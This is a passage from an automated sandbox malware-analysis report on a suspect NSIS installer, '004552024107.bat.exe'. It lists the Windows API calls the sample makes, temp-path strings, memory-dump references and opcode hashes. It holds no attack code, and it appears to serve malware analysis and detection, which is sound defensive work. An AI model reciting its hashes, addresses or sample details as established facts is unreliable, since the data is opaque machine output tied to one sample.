                                            • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E24D7
                                              • Part of subcall function 6D0E12B4: lstrcpynA.KERNEL32(00000000,?,6D0E135F,-6D0E504B,6D0E11C0,-000000A0), ref: 6D0E12C4
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6D0E2452
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6D0E2467
                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6D0E2478
                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 6D0E2486
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E248D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                            • String ID:
                                            • API String ID: 3730416702-0
                                            • Opcode ID: c0d2d0a7b4be6d7512353efa9878a35571b3964256b3abf49a49b8c8180f43bd
                                            • Instruction ID: 529f92f1323337acb9b4d0b5fa608a1557215eb04d0d6525e1f26a907960030a
                                            • Opcode Fuzzy Hash: c0d2d0a7b4be6d7512353efa9878a35571b3964256b3abf49a49b8c8180f43bd
                                            • Instruction Fuzzy Hash: C94159B1508306EFE720DF38D844B6AB3F8FB46795F108A2AF6459B581E770D544CBA2
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                            • GlobalFree.KERNEL32(?), ref: 004028C9
                                            • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                            • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                            • Opcode Fuzzy Hash: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                            • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401DA3
                                            • GetClientRect.USER32(?,?), ref: 00401DF1
                                            • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                            • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                            • DeleteObject.GDI32(00000000), ref: 00401E45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                            • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                            • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                            APIs
                                            • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                            • wsprintfA.USER32 ref: 00404C1C
                                            • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                            • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                            • Opcode Fuzzy Hash: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                            • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                            APIs
                                              • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,prophetess Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                              • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,76D53410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405CC6
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,76D53410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405D60
                                            • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,76D53410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,76D53410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj7426.tmp
                                            • API String ID: 3248276644-3237808906
                                            • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                            • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                                            • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                            • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                                            • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-787714339
                                            • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                            • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                                            • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                            • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                                            APIs
                                            • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,76D53410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405CC6
                                            • CharNextA.USER32(00000000), ref: 00405CCB
                                            • CharNextA.USER32(00000000), ref: 00405CDF
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsj7426.tmp, xrefs: 00405CB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj7426.tmp
                                            • API String ID: 3213498283-3895652539
                                            • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                            • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                                            • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                            • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                            • GetTickCount.KERNEL32 ref: 00402EFE
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                            • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                            • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                            APIs
                                            • FreeLibrary.KERNEL32(?,76D53410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                                            • GlobalFree.KERNEL32(00802480), ref: 00403A22
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-787714339
                                            • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                            • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                                            • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                            • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\004552024107.bat.exe,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\004552024107.bat.exe,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3443045126
                                            • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                            • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                                            • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                            • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6D0E116B
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6D0E11D8
                                            • GlobalFree.KERNEL32(?), ref: 6D0E1286
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E129B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID:
                                            • API String ID: 3394109436-0
                                            • Opcode ID: 39d73b62f8b5096edb10943062524e321cdf6694c1203dbed31e75b31efb5dd2
                                            • Instruction ID: a15ad67a89201a36b6c754ce5da29367fccdd47b005eaa8de447274f2d165a81
                                            • Opcode Fuzzy Hash: 39d73b62f8b5096edb10943062524e321cdf6694c1203dbed31e75b31efb5dd2
                                            • Instruction Fuzzy Hash: B7519EB9504206DFEB01CF68C888B3E7BF8FB4A784B444859F655D7254E734D920CB92
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                            • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
